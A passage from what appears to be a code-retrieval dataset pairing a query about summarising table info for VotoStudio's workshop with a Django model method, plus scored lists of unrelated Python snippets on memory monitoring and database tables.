the process is running.\n for stat, tag in ((\"local_node\", \"local\"),\n (\"other_node\", \"remote\")):\n print (\"sys.numa.allocation %d %s node=%d type=%s\"\n % (ts, stats[stat], node_id, tag))\n # Pages successfully allocated with the interleave policy.\n print (\"sys.numa.interleave %d %s node=%d type=hit\"\n % (ts, stats[\"interleave_hit\"], node_id))", "def sys_service_memory():\n sort_cmd = [\"sort\", \"-k\", \"2nr\"]\n\n p_table = prettytable.PrettyTable(\n ['Service',\n 'Resident Set Size (MiB)',\n ], caching=False)\n p_table.align = 'l'\n p_table.align['Resident Set Size (MiB)'] = 'r'\n\n try:\n output = pipe_command(GREP_CMD, AWK_CMD, sort_cmd,\n cwd=MEMPATH + \"system.slice\")\n LOG.debug(\n 'command: %s\\n%s',\n ' '.join(GREP_CMD + [MEMPATH] + AWK_CMD + sort_cmd), output)\n except subprocess.CalledProcessError as error:\n LOG.error('Could not get total_rss memory, error=%s', error)\n return 1\n\n for line in output.split(\"\\n\"):\n service = line.split(\"memory.stat:total_rss \")[0]\n rss_mem = line.split(\"memory.stat:total_rss \")[-1]\n p_table.add_row(\n [service,\n mem_to_mebibytes(rss_mem),\n ])\n\n # Delete first row wich display total system.slice rss\n p_table.del_row(0)\n return p_table", "def get_ram_info():\n ram_cent = psutil.virtual_memory()[2]\n return str(ram_cent)", "def print_data(self):\n\n\t\t# Open the output file\n\t\tfdo = open(self.out_file, 'w')\n\n\t\tfor area in self.mem_areas.keys():\n\t\t\tfdo.write('\\nArea Range : 0x%.9x - 0x%.9x\\n\\n' % (area, self.mem_areas[area][0]))\n\t\t\tfor key in self.data_hash.keys():\n\t\t\t\tif key > area and key < self.mem_areas[area][0]:\n\t\t\t\t\t# Find out if the page lies in the memory area\n\t\t\t\t\tfdo.write('0x%.8x : %d\\n' % (key, self.data_hash[key]))\n\n\t\tfdo.close()\n\n\t\treturn", "def memory():\n\n mem_info = {}\n\n if 
platform.linux_distribution()[0]:\n with open('/proc/meminfo') as file:\n c = 0\n for line in file:\n lst = line.split()\n if str(lst[0]) == 'MemTotal:':\n mem_info['total'] = int(lst[1])\n elif str(lst[0]) in ('MemFree:', 'Buffers:', 'Cached:'):\n c += int(lst[1])\n mem_info['free'] = c\n mem_info['used'] = (mem_info['total']) - c\n elif platform.mac_ver()[0]:\n ps = subprocess.Popen(['ps', '-caxm', '-orss,comm'], stdout=subprocess.PIPE).communicate()[0]\n vm = subprocess.Popen(['vm_stat'], stdout=subprocess.PIPE).communicate()[0]\n\n # Iterate processes\n process_lines = ps.split('\\n')\n sep = re.compile('[\\s]+')\n rss_total = 0 # kB\n for row in range(1, len(process_lines)):\n row_text = process_lines[row].strip()\n row_elements = sep.split(row_text)\n try:\n rss = float(row_elements[0]) * 1024\n except:\n rss = 0 # ignore...\n rss_total += rss\n\n # Process vm_stat\n vm_lines = vm.split('\\n')\n sep = re.compile(':[\\s]+')\n vm_stats = {}\n for row in range(1, len(vm_lines) - 2):\n row_text = vm_lines[row].strip()\n row_elements = sep.split(row_text)\n vm_stats[(row_elements[0])] = int(row_elements[1].strip('\\.')) * 4096\n\n mem_info['total'] = rss_total\n mem_info['used'] = vm_stats[\"Pages active\"]\n mem_info['free'] = vm_stats[\"Pages free\"]\n else:\n raise('Unsupported Operating System.\\n')\n exit(1)\n\n return mem_info", "def get_memory():\n with open('/proc/meminfo', 'r') as mem:\n free_memory = 0\n for i in mem:\n sline = i.split()\n if str(sline[0]) in ('MemFree:', 'Buffers:', 'Cached:'):\n free_memory += int(sline[1])\n print(\"____________________ \" + str(free_memory) + \"____________________\")\n return free_memory", "def print_performance_info(self):\n pass", "def deviceMemory(self):\n return 1", "def get_mem():\n return {\n 'MEM': string_chopped_to_float(psutil.virtual_memory(), 'percent=', ', used'),\n }", "def get_memory(self):\n return self.loss_memory", "def check_mem(self, values):\n try:\n virt_mem = psutil.virtual_memory()\n values[keys.KEY_VIRTUAL_MEM_TOTAL] = virt_mem.total\n values[keys.KEY_VIRTUAL_MEM_PERCENT] = virt_mem.percent\n except:\n logging.error(\"Error collecting memory stats.\")", "def memory(self):\r\n return self._memory", "def get_total_memory_size(self):\n memory = 0\n for i in range(4):\n for j in range(4):\n memory += self.system.operator[i, j].memory\n return memory", "def freemem(extra_alloc=0):\r\n gc.collect()\r\n gc.collect()\r\n gc.collect()\r\n n_mallocs = cuda.cuda_ndarray.cuda_ndarray.outstanding_mallocs()\r\n\r\n if hasattr(cuda.cuda_ndarray.cuda_ndarray, \"theano_allocated\"):\r\n theano_alloc = cuda.cuda_ndarray.cuda_ndarray.theano_allocated()\r\n return (\"(n malloc/theano mem allocated in KB)\",\r\n n_mallocs + extra_alloc,\r\n int(theano_alloc / 1024) + extra_size)\r\n\r\n return (\"n malloc on the gpu\", n_mallocs + extra_alloc)\r\n # I don't use the following by default as if there is other stuff running\r\n # on the GPU, this won't work.\r\n mem_info = cuda.cuda_ndarray.cuda_ndarray.mem_info()\r\n gpu_used = (mem_info[1] - mem_info[0]) / 1024 ** 2\r\n mem_info_msg = \"(n malloc/gpu mem used in MB)\"\r\n return (mem_info_msg, n_mallocs, int(gpu_used))", "def getMemory(self):\n return self.memory", "def _debugmallocstats(): # real signature unknown; restored from __doc__\n pass", "def diagnostics(self):\r\n # NB: should be not None for multiprocessing works\r\n return {}", "def stat_cuda(msg: str) -> None:\n print(f'-- {msg:<35} allocated: %dM, max allocated: %dM, cached: %dM, max cached: %dM' % (\n 
torch.cuda.memory_allocated() / 1024 / 1024,\n torch.cuda.max_memory_allocated() / 1024 / 1024,\n torch.cuda.memory_cached() / 1024 / 1024,\n torch.cuda.max_memory_cached() / 1024 / 1024\n ))", "def memory_usage(self):\n\n def multiply_iter(iterable):\n res = 1\n for x in iterable:\n res *= x\n return res\n\n def add_params(parameter):\n res = 0\n for x in parameter:\n res += multiply_iter(x.shape)\n return res\n\n feat = add_params(self.features.parameters())\n clsf = add_params(self.classifier.parameters())\n total = feat + clsf\n\n mb_f = 4 / 1024 ** 2\n\n print(\"Conv : {0}\".format(feat))\n print(\"FC : {0}\".format(clsf))\n print(\"-----------------\")\n print(\"Total : {0}\".format(total))\n print(\"Memory : {0:.2f}MB\".format(total * mb_f))\n print(\"\")", "def monitor_memory(df, before=True, description='', round_at=6):\n from psutil import virtual_memory\n step = 'Before' if before else 'After'\n description = '-' if not description else description+' -'\n \n # Convert values to gigs\n convert_to_gig = lambda x: round(x / 1024**3, round_at)\n \n # Get statistics\n df_shape = df.shape\n df_memory = convert_to_gig(df.memory_usage(deep=True).sum())\n df_server_memory_available = convert_to_gig(virtual_memory().available)\n df_server_memory_used = convert_to_gig(virtual_memory().used)\n \n print('{0} {1} dataframe shape: {2}'.format(step, description, df_shape))\n print('{0} {1} dataframe memory size: {2} GBytes'.format(step, description, df_memory))\n print('{0} {1} server available memory: {2} GBytes'.format(step, description, df_server_memory_available))\n print('{0} {1} server used memory: {2} GBytes'.format(step, description, df_server_memory_used))", "def get_total_memory_size(self):\n return self.drt_manager.get_total_memory_size()", "def logmem(cls, tag):\n\n cls.logger.info(\"----%s----\", str(tag))\n mem = psutil.virtual_memory()\n cls.logger.info(\"total:%s M\", mem.total / 1024 / 1024)\n cls.logger.info(\"available:%s M\", mem.available / 1024 / 1024)\n cls.logger.info(\"used:%s M\", mem.used / 1024 / 1024)\n cls.logger.info(\"free:%s M\", mem.free / 1024 / 1024)\n cls.logger.info(\"active:%s M\", mem.active / 1024 / 1024)\n cls.logger.info(\"inactive:%s M\", mem.inactive / 1024 / 1024)\n cls.logger.info(\"buffers:%s M\", mem.buffers / 1024 / 1024)\n cls.logger.info(\"cached:%s M\", mem.cached / 1024 / 1024)\n cls.logger.info(\"shared:%s M\", mem.shared / 1024 / 1024)", "def memory():\n\twith open('/proc/meminfo','r') as mem:\n\t\tret = {}\n\t\ttmp = 0\n\t\tfor i in mem:\n\t\t\tsline = i.split()\n\t\t\tif str(sline[0])=='MemTotal:':\n\t\t\t\tret['total'] = int(sline[1]*1.0e-6)\n\treturn ret", "def sane_memory_attributes(memory_info):\n errors = []\n warnings = []\n for grp in memory_info:\n mem_lim_mb = memory_info[grp]['memory.limit_in_bytes'] // 1024**2\n memsw_limit_mb = memory_info[grp]['memory.memsw.limit_in_bytes'] // 1024**2\n if mem_lim_mb != memsw_limit_mb:\n errors.append('{0}/memory.limit and memsw.limit differ'.format(grp))\n if memory_info[grp]['memory.use_hierarchy'] == 0:\n arr = warnings if grp == '.' 
else errors\n arr.append('{0}/memory.use_hierarchy is 0'.format(grp))\n if filters.is_sp_cgroup(grp) or grp in ('system.slice', 'user.slice',\n 'machine.slice', 'mgmt.slice'):\n if memory_info[grp]['memory.move_charge_at_immigrate'] == 0:\n errors.append('{0}/memory.move_charge_at_immigrate is 0'.format(grp))\n if filters.is_sp_cgroup(grp) and memory_info[grp]['memory.swappiness'] != 0:\n add_to = warnings if grp == 'mgmt.slice' else errors\n add_to.append('{0}/memory.swappiness is not 0'.format(grp))\n return errors, warnings", "def print_max_sizes(self):\n print(\"max_sizes: %s\" % self.max_sizes)", "def get_space_used():\n fs.get_space_used()", "def memory_get_usage():\n raise NotImplementedError()", "def __repr__(self):\n return 'Go By Majority' + (self.memory > 0) * (\"/%i\" % self.memory)", "def debugMemory(activate):\n ret = libxml2mod.xmlDebugMemory(activate)\n return ret", "def get_memory_usage(cls):\n\n mem_stats = psutil.virtual_memory()\n\n mem_stats_dict = { StatsKeys.MEMORY :\n {\n StatsKeys.TOTAL : mem_stats.total,\n StatsKeys.AVAILABLE : mem_stats.available,\n StatsKeys.USED : mem_stats.used\n }\n }\n logger.debug(\"Memory stats: {}\".format(mem_stats_dict))\n\n return mem_stats_dict", "def print_fragmentation():\n\n frag_dict = calculate_fragmentation()\n \n _print_fragmentation(frag_dict, sys.stdout)", "def collect():\n\n command = \"cat /proc/meminfo |grep MemTotal|awk -F' ' '{print $2}'\"\n memTotal_f = round(float(os.popen(command).read())/1024/1000,0)\n memTotal = int(memTotal_f)\n cmd = 'df -h |grep \"/dev/s\"'\n metric_disk = os.popen(cmd).readlines()\n hardNum=[]\n for i in metric_disk:\n hard_space = float((i.strip().split()[1])[:-1])\n hardNum.append(hard_space)\n\n disk_info = sum(hardNum)\n disk_use = {}\n metric_disks=os.popen('df -x tmpfs -x devtmpfs | grep -Eo \" /\\S*$\" ').readlines()\n for disk in metric_disks:\n cmd = 'df|grep -E \"%s$\"' % disk.strip()\n disks = os.popen(cmd).readlines()[0]\n disk_list = disks.split()\n disk_use[disk_list[5]]=disk_list[4]\n hard = {\n \"disk_used\" : disk_use,\n \"disk_total\":disk_info,\n \"mem_total\":memTotal\n }\n\n return hard", "def print_metrics(self):\n # num times regular barcodes appear in a simulated doublet nearest neighbors, grouped by value\n # TODO: this list is 2 dimensional... 
need to extract dimensione with counts for the counter\n frequencies = [i[1] for i in self.num_times_knn]\n counter = collections.Counter(frequencies)\n print(\"##\\nNumber time barcoded in sim doub KNN: {}\".format(counter))\n\n # artificial fraction\n print(\"##\\nArtificial fraction: {}\".format(self.artificial_fraction))\n\n # num doublets\n print(\"##\\nNumber of doublets called: {}\".format(self.num_doublets))", "def memory(self) -> Optional[Any]:\n return pulumi.get(self, \"memory\")", "def memory(self) -> Optional[Any]:\n return pulumi.get(self, \"memory\")", "def checkMemDetail(self):\n mem = self.getMemDetail()\n err_msg = []\n task_result = device_status = 0\n\n if not mem:\n err_msg.append('Get Memory detail info failed')\n task_result = device_status = 1\n else:\n # 以后可扩展告警条件\n pass\n return mem, err_msg, task_result, device_status", "def memory_snapshot(tag, rank):\n GB = 1024 * 1024 * 1024\n MB = 1024 * 1024\n KB = 1024\n\n peak = dgl.partition.get_peak_mem() * KB\n mem = psutil.virtual_memory()\n avail = mem.available / MB\n used = mem.used / MB\n total = mem.total / MB\n\n mem_string = f\"{total:.0f} (MB) total, {peak:.0f} (MB) peak, {used:.0f} (MB) used, {avail:.0f} (MB) avail\"\n logging.debug(f\"[Rank: {rank} MEMORY_SNAPSHOT] {mem_string} - {tag}\")", "def info(self):\n import string\n results = self.info_list()\n labels = \"%-8s %-9s %-4s %-8s %-8s %-4s\" % \\\n ('MACHINE','CPU','GHZ','MB TOTAL',\n 'MB FREE','LOAD')\n print labels\n for i in range(len(self.workers)):\n name = string.split(self.workers[i].host,'.')[0]\n res = results[i]\n s = \"%-8s %2dx%-6s %4.1f %8.1f %8.1f %4.2f\" % \\\n (name[-8:], res['cpu_count'],res['cpu_type'][-6:], \\\n res['cpu_speed'],res['mem_total'],res['mem_free'],\\\n res['load_1'])\n print s", "def allocatememory(self):\n pass", "def get_memory_info(ssh):\r\n cmd04='wmic memorychip get capacity'\r\n retry_number1=3\r\n try:\r\n while True:\r\n if retry_number1 == 0:\r\n logger.writeLog(\"get memory sum size fail\",level='error')\r\n break\r\n stdin,stdout,stderr=ssh.exec_command(cmd04)\r\n data04=stdout.read().decode().strip('Capacity')\r\n print(data04)\r\n if data04 == \"\":\r\n retry_number1 -= 1\r\n logger.writeLog(\"get memory sum size data null\",level='error')\r\n continue\r\n else:\r\n result_list=data04.split()\r\n print(result_list)\r\n memory_size=float(int(result_list[0])+int(result_list[1]))/1024/1024/1024\r\n print(\"mem total Gb: \",memory_size)\r\n logger.writeLog(\"get memory sum size success\",level='info')\r\n # return memory_size\r\n break\r\n except:\r\n logger.writeLog(\"get memory size error\",level='error')\r\n return None\r\n\r\n#6.内存剩余量/Gb\r\n# def get_memory_surplus(ssh):\r\n \"\"\"get memory surplus\"\"\"\r\n cmd05='wmic OS get FreePhysicalMemory'\r\n retry_number2=3\r\n try:\r\n while True:\r\n if retry_number2 == 0:\r\n logger.writeLog(\"get memory surplus fail\",level='error')\r\n break\r\n stdin,stdout,stderr=ssh.exec_command(cmd05)\r\n data05=int(stdout.read().decode().split()[1])\r\n print(data05)\r\n if data05 == \"\":\r\n logger.writeLog(\"get memory surplus data null\",level='error')\r\n retry_number2 -= 1\r\n continue\r\n else:\r\n memory_surplus=round(float(data05)/1024/1024,4)\r\n print(\"mem free Gb: \",memory_surplus)\r\n logger.writeLog(\"get memory surplus data success\",level='info')\r\n # return memory_surplus\r\n break\r\n except:\r\n logger.writeLog(\"get memory surplus error\",level='error')\r\n return None\r\n\r\n#7.内存使用率\r\n# def get_memory_ratio(ssh):\r\n \"\"\"get memory 
ratio\"\"\"\r\n # memory_size=get_memory_size(ssh)\r\n # memory_surplus=get_memory_surplus(ssh)\r\n if memory_size == \"\" or memory_surplus == \"\":\r\n logger.writeLog(\"memory_szie is null or memory_surplus is null\",level='error')\r\n return None\r\n else:\r\n try:\r\n data06=round(float((memory_size-memory_surplus))/memory_size,4)\r\n print(\"mem use ratio: \",data06)\r\n logger.writeLog(\"get memory ratio success\",level='info')\r\n return (memory_size,memory_surplus,data06)\r\n except:\r\n logger.writeLog(\"get memory ratio error\",level='error')\r\n return None", "def print_heap(self):\n print self.queue[:self.size:]", "def MemoryInfo(cls):\n\t\tres = {}\n\t\tfor line in cat(\"/proc/meminfo\").split(\"\\n\")[:-1]:\n\t\t\tline = RE_SPACES.sub(\" \", line).strip().split(\" \")\n\t\t\tname, value = line[:2]\n\t\t\tres[name.replace(\"(\", \"_\").replace(\")\", \"_\").replace(\":\", \"\")] = int(value)\n\t\treturn res", "def diagnostics(self, oid):\n path = '/servers/%s/diagnostics' % oid\n res = self.client.call(path, 'GET', data='', token=self.manager.identity.token)\n self.logger.debug('Shows basic usage data for server %s: %s' % \n (oid, truncate(res)))\n return res[0]", "def show(self, threadID):\n print(\"[thread %d] Simulated Clustered Disk Space Allocation\" % threadID)\n line = '=' * 32\n print line\n for i in range(self.size/32):\n print ''.join(self.disk_mem[32*i:32*(i+1)])\n print line", "def report(self):\n np.set_printoptions(formatter={'float': '{:.2e}'.format})\n print('---Differences of breakpoints---')\n all_max = np.max(self.max, axis=0, keepdims=False)\n print('Maximum:\\n', all_max)\n all_mean = np.mean(self.mean, axis=0, keepdims=False)\n print('Mean:\\n', all_mean)", "def virtual_memory():\n mem = cext.virtual_mem()\n totphys, availphys, totsys, availsys = mem\n #\n total = totphys\n avail = availphys\n free = availphys\n used = total - avail\n percent = usage_percent((total - avail), total, round_=1)\n return svmem(total, avail, percent, used, free)", "def check(cls):\n vms = list(cls._vm_agents_for_host())\n\n large_overhead_vms = []\n swapping_vms = []\n total_guest_and_overhead = 0\n expected_guest_and_overhead = 0\n\n # individual VMs ok?\n for vm in vms:\n with vm:\n try:\n vm_mem = vm.qemu.proc().memory_full_info()\n except Exception:\n # It's likely that the process went away while we analyzed\n # it. 
Ignore.\n continue\n if vm_mem.swap > 1 * GiB:\n swapping_vms.append(vm)\n expected_size = (\n vm.cfg[\"memory\"] * MiB\n + 2 * vm.qemu.vm_expected_overhead * MiB\n )\n expected_guest_and_overhead += (\n vm.cfg[\"memory\"] * MiB + vm.qemu.vm_expected_overhead * MiB\n )\n total_guest_and_overhead += vm_mem.pss\n if vm_mem.pss > expected_size:\n large_overhead_vms.append(vm)\n\n output = []\n result = OK\n if large_overhead_vms:\n result = WARNING\n output.append(\n \"VMs with large overhead: \"\n + \",\".join(x.name for x in large_overhead_vms)\n )\n if swapping_vms:\n result = WARNING\n output.append(\n \"VMs swapping:\" + \",\".join(x.name for x in swapping_vms)\n )\n if total_guest_and_overhead > expected_guest_and_overhead:\n result = CRITICAL\n output.append(\"High total overhead\")\n\n if result is OK:\n output.insert(0, \"OK\")\n elif result is WARNING:\n output.insert(0, \"WARNING\")\n elif result is CRITICAL:\n output.insert(0, \"CRITICAL\")\n else:\n output.insert(0, \"UNKNOWN\")\n\n output.insert(1, \"{} VMs\".format(len(vms)))\n output.insert(\n 2, \"{:,.0f} MiB used\".format(total_guest_and_overhead / MiB)\n )\n output.insert(\n 3, \"{:,.0f} MiB expected\".format(expected_guest_and_overhead / MiB)\n )\n\n print(\" - \".join(output))\n\n return result", "def print_stats():\n if spritegroup_stats[0] > 0:\n generic.print_info(\"Concurrent spritegroups: {}/{} ({})\".format(spritegroup_stats[0], total_action2_ids, str(spritegroup_stats[1])))\n if a2register_stats[0] > 0:\n generic.print_info(\"Concurrent Action2 registers: {}/{} ({})\".format(a2register_stats[0], total_tmp_locations, str(a2register_stats[1])))", "def print(self):\r\n print(\"[DEBUG] STACK: \", self.__memory.__repr__())", "def get_gpu_memory_map():\n result = subprocess.check_output(\n [\n 'nvidia-smi', '--query-gpu=memory.used',\n '--format=csv,nounits,noheader'\n ], encoding='utf-8')\n # Convert lines into a dictionary\n gpu_memory = [int(x) for x in result.strip().split('\\n')]\n gpu_memory_map = dict(zip(range(len(gpu_memory)), gpu_memory))\n print(\"Current usage: %i of 11178\" % gpu_memory_map[1])", "def ufree(verbose=False):\n import gc\n import os\n F = gc.mem_free()\n A = gc.mem_alloc()\n T = F+A\n P = '{0:.2f}%'.format(F/T*100)\n if not verbose:\n return P\n return ('Total: {} Free: {} ({})'.format(T ,F, P))", "def _memtop_setup():\n return (\n _memtop_setup_parser,\n _memtop_exec,\n \"Display source lines that allocate the most memory.\"\n )", "def GraphMemVsSize(data, args, cmd):\n p = data[args][cmd]\n vers = sorted(p)\n sizes = sorted(p[vers[0]])\n for ver in vers:\n mems = [p[ver][size][1] for size in sizes]\n plt.plot(sizes, mems, label=ver)\n if cmd == 'delta':\n mult=10240\n else:\n mult=32\n ax = plt.gca()\n ax.yaxis.set_major_locator(MultipleLocator(mult))\n ax.set_xlim(left=0, right=1024)\n #plt.xscale('log')\n #plt.yscale('log')\n saveplt('data/mem-size-%s-%s.svg' % (args,cmd), '%s memory vs filesize for %s' % (cmd, args),\n 'filesize', 'KB', sizeticks)", "def _get_resident_memory_in_bytes():\n\n # Convert Kb to bytes\n k = 2**10\n\n if os.name == 'posix':\n # In Linux and MaxOS\n mem = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss\n\n # In Linux, the output of the command is in Kb. 
Convert to Bytes.\n if sys.platform == 'linux':\n mem *= k\n\n else:\n # In windows\n pid = os.getpid()\n command = ['tasklist', '/fi', '\"pid eq %d\"' % pid]\n\n try:\n pid = os.getpid()\n command = ['tasklist', '/fi', 'pid eq %d' % pid]\n process = subprocess.Popen(command, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, stderr = process.communicate()\n error_code = process.poll()\n if error_code != 0:\n mem = 'n/a'\n return mem\n\n # Parse output\n last_line = stdout.strip().decode().split(\"\\n\")[-1]\n\n # Check last line of output has any number in it\n is_digit = [char.isdigit() for char in last_line]\n if not any(is_digit):\n mem = 'n/a'\n return mem\n\n # Get memory as string and its unit\n mem_string = last_line.split(' ')[-2].replace(',', '')\n mem = int(mem_string)\n mem_unit = last_line.split(' ')[-1]\n\n # Convert bytes based on the unit\n if mem_unit == 'K':\n exponent = 1\n if mem_unit == 'M':\n exponent = 2\n if mem_unit == 'G':\n exponent = 3\n if mem_unit == 'T':\n exponent = 4\n\n # Memory in bytes\n mem = mem * (k**exponent)\n\n except FileNotFoundError:\n mem = 'n/a'\n\n return mem", "def printMachineStatOut():\n print(\"---------------MACHINES STATS --------------------------\\n\", file=out_file)\n for machine in machines_list:\n cur_job_list = machine.retrieveJobsList()\n print(\"machine number \", machine.number, \"assigned jobs [number,length,type]:\", file=out_file)\n l = []\n for job_number, job in cur_job_list.items():\n l.append(job)\n print(\"\".join(str(l)), file=out_file)\n\n print(\"Assigned types: \", machine.getTypes(), file=out_file)\n print(\"Types histogram: \", machine.types, \"Sum of each type: \", machine.types_sums, \"Makespan : \", machine.span,\n file=out_file)\n print(\"\\n\", file=out_file)\n print(\"Max makespan is : \", makeSpan(), file=out_file)", "def node_memory_allocatable(self) -> units.Quantity:\n stdout, _, _ = RunKubectlCommand(\n # TODO(pclay): Take a minimum of all nodes?\n [\n 'get', 'nodes', '-o',\n 'jsonpath={.items[0].status.allocatable.memory}'\n ])\n return units.ParseExpression(stdout)", "def ls(cls):\n for vm in cls._vm_agents_for_host():\n with vm:\n running = vm.qemu.process_exists()\n\n if running:\n vm_mem = vm.qemu.proc().memory_full_info()\n\n expected_size = (\n vm.cfg[\"memory\"] * 1024 * 1024\n + vm.qemu.vm_expected_overhead * 1024 * 1024\n )\n\n log.info(\n \"online\",\n machine=vm.name,\n cores=vm.cfg[\"cores\"],\n memory_booked=\"{:,.0f}\".format(vm.cfg[\"memory\"]),\n memory_pss=\"{:,.0f}\".format(vm_mem.pss / MiB),\n memory_swap=\"{:,.0f}\".format(vm_mem.swap / MiB),\n )\n else:\n log.info(\"offline\", machine=vm.name)", "def get_memory(self, mem_type='usedMemory'):\n pass", "def get_memory_usage():\n\n memory_usage = {'total' : 0, 'used' : 0}\n meminfo = subprocess.Popen(['free', '-m'], shell=False, stdout=subprocess.PIPE)\n meminfo.stdout.readline()\n total_used = meminfo.stdout.readline()\n memory_usage['total'] = total_used.split()[1]\n memory_usage['used'] = total_used.split()[2]\n return memory_usage" ]
[ "0.70509243", "0.7048715", "0.684797", "0.6824635", "0.6806491", "0.67121667", "0.6675784", "0.66524774", "0.6635588", "0.66292006", "0.65855217", "0.6583841", "0.6535865", "0.65259236", "0.65087706", "0.6496641", "0.64578336", "0.6444816", "0.64439434", "0.63657725", "0.63657725", "0.63657725", "0.63657725", "0.63657725", "0.63657725", "0.63657725", "0.6347976", "0.6283169", "0.6278183", "0.62705874", "0.6260743", "0.6253554", "0.62297696", "0.622765", "0.61809397", "0.6148777", "0.61437875", "0.61392707", "0.61114216", "0.60920465", "0.60700303", "0.6062893", "0.6028777", "0.60236174", "0.5993774", "0.5972191", "0.5969565", "0.59626937", "0.5960566", "0.5927692", "0.59204865", "0.5894464", "0.5893296", "0.5873113", "0.5871291", "0.585255", "0.58517265", "0.5851493", "0.5821422", "0.5808203", "0.5777651", "0.5767466", "0.57633495", "0.57629406", "0.57504296", "0.5724862", "0.571385", "0.56952786", "0.5693873", "0.56848556", "0.56722987", "0.5662998", "0.565931", "0.5658601", "0.56560826", "0.56560826", "0.56500137", "0.5648572", "0.5640975", "0.56405", "0.5640306", "0.56238145", "0.5617173", "0.5614846", "0.5604775", "0.55969423", "0.5586304", "0.5585877", "0.55838585", "0.5583118", "0.5571126", "0.5570619", "0.55677885", "0.5558766", "0.55583346", "0.5558132", "0.55575544", "0.5552457", "0.5546736", "0.5541367" ]
0.74818563
0
Return some simple info for the tables in VotoStudio's workshop.
def get_table_values(self):
    table_descriptors = getattr(self, 'table_descriptors', None)
    if not table_descriptors:
        raise AttributeError(f"Please add the 'table_descriptors' field to the model '{self._meta.label}'")

    return {
        'id': self.id,
        'descriptors': [{
            'name': d,
            'value': self._get_descriptor_value(d),
        } for d in table_descriptors],
        'app_label': self._meta.app_label,
        'model_name': self._meta.model_name,
        'model_label': self._meta.label,
        **self._get_user_info(),
    }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def show_table():\n\n title_list = ('ID', 'Platform', 'Producer', 'Year', 'Elements')\n \n return table, title_list", "def PrintInfo(self):\n infoname = list(zip(*self.basicinfo.cursor.execute(\n \"SELECT Name FROM Infoname\").fetchall()))[0]\n for obj in infoname:\n s = (\"SELECT Col, Row, TableNum FROM %s WHERE \"\n \"TestItems=%s\" % (self.position, \"'\" + obj + \"'\"))\n [col, row, tablenum] = self.basicinfo.cursor.execute(s).fetchone()\n s = \"SELECT %s FROM TestInfo\" % obj\n content = self.db.cursor.execute(s).fetchone()[0]\n if tablenum is not None:\n self.doc.TableContent(\n tablenum=tablenum, cellrow=row, cellcolum=col,\n insertcontent=content)", "def table_info(self):\n for customer in self.customers:\n print(customer.get_name())", "def info_table(table):\n print \"\\nSCHEMA de la taula \",table, \"es: \"\n con=lite.connect('parking.db')\n cur=con.cursor()\n cur.execute(\"PRAGMA table_info({});\".format(table))\n data = cur.fetchall()\n for d in data:\n print \"\\t\",d[0], d[1], d[2]\n con.close()", "def info(dataset, indent, meta_member, verbose, quiet):\n verbosity = verbose - quiet\n configure_logging(verbosity)\n table = bcdata.validate_name(dataset)\n wfs = WebFeatureService(url=bcdata.OWS_URL, version=\"2.0.0\")\n info = {}\n info[\"name\"] = table\n info[\"count\"] = bcdata.get_count(table)\n info[\"schema\"] = wfs.get_schema(\"pub:\" + table)\n if meta_member:\n click.echo(info[meta_member])\n else:\n click.echo(json.dumps(info, indent=indent))", "def workspace_show_table_format(workspace):\n row = OrderedDict()\n row['Name'] = workspace['name']\n row['Resource Group'] = workspace['resourceGroup']\n row['Location'] = workspace['location']\n row['State'] = workspace['provisioningState']\n return row", "def show_db_overview(self):\n\n models_list = sorted_models_list()\n apps = [p.app_label for p in settings.SITE.installed_plugins]\n s = \"%d apps: %s.\" % (len(apps), \", \".join(apps))\n s += \"\\n%d models:\\n\" % len(models_list)\n i = 0\n headers = [\n #~ \"No.\",\n \"Name\",\n \"Default table\",\n #~ \"M\",\n \"#fields\",\n \"#rows\",\n #~ ,\"first\",\"last\"\n ]\n rows = []\n for model in models_list:\n if True: # model._meta.managed:\n i += 1\n cells = []\n #~ cells.append(str(i))\n cells.append(fmn(model))\n cells.append(model.get_default_table())\n #~ cells.append(str(model))\n #~ if model._meta.managed:\n #~ cells.append('X')\n #~ else:\n #~ cells.append('')\n cells.append(str(len(model._meta.concrete_fields)))\n qs = model.objects.all()\n n = qs.count()\n cells.append(str(n))\n #~ if n:\n #~ cells.append(obj2str(qs[0]))\n #~ cells.append(obj2str(qs[n-1]))\n #~ else:\n #~ cells.append('')\n #~ cells.append('')\n\n rows.append(cells)\n s += rstgen.table(headers, rows)\n return s", "def print_tables(self):\n print \"------------------\\nTables\\n------------------\"\n cnt = 0\n for x in self.show_tables():\n cnt += 1\n print (\"{0}.) 
{1}\".format(cnt, x[0]))", "def basic_table_details():\n tbl: pa.table = pa.Table.from_pylist([\n {'first_name': 'Kakashi', 'last_name': 'Hatake', },\n {'first_name': 'Itachi', 'last_name': 'Uchiha', },\n {'first_name': 'Shisui', 'last_name': 'Uchiha', },\n ])\n\n results = {\n 'column_names': tbl.column_names,\n 'columns > map > combine_chunks > to_pylist': [col.combine_chunks().to_pylist() for col in tbl.columns],\n 'nbytes': tbl.nbytes,\n 'num_columns': tbl.num_columns,\n 'num_rows': tbl.num_rows,\n 'schema': tbl.schema,\n 'shape': tbl.shape,\n }\n\n print(results)", "def show_data_table(self):\n return self.container['show_data_table']", "def show_table(table):\n # id: string\n # Unique and random generated (at least 2 special char()expect: ';'),\n # 2 number, 2 lower and 2 upper case letter)\n # title: string\n # manufacturer: string\n # price: number (dollars)\n # in_stock: number\n title_list = [\"ID\", \"Title\", \"Manufacturer\",\n \"Price\", \"Number in stock\"]\n ui.print_table(table, title_list)", "def show_catalogue(self):\n\n data = cur.execute(\"\"\"SELECT productid, productname, unitcost, stock, location \n FROM catalogue WHERE vendorname = ?\"\"\", (self.vendorname,)).fetchall()\n print(tabulate(data, headers=[\"Product ID\", \"Name\", \"Unit Cost\", \"Stock\", \"Location\"]))", "async def show(self, table_name: str = ToolDataTableName) -> ToolDataDetails:\n return self.tool_data_manager.show(table_name)", "def getTableHead():\n return [\"Reporter\", \"Reportee\", \"aln. DKIM\", \"aln. SPF\", \"Disposition\",\n \"DKIM result\", \"SPF result\", \"msg#\", \"IP\", \"Country\",\n \"Report Begin\", \"Report End\", \"Report ID\"]", "def _get_table_info(self):\n highestbet = self.highestBetNotFold(),\n bigb =self.bigBlind() if self._game_state == GAME_STATE_PRE_FLOP and not self.inSmallBlindPosition() else 0\n return [\"blinds: small:%r big:%r\" % (self.small_blind, self.big_blind),\n \"buy_ins: min:%r max:%r\" % (self.min_buy_in, self.max_buy_in),\n \"bs: %r\" % self.betting_structure,\n \"highestbet = %r\" % highestbet,\n \"bigb = %r\" % bigb,]", "def table(self):\n return 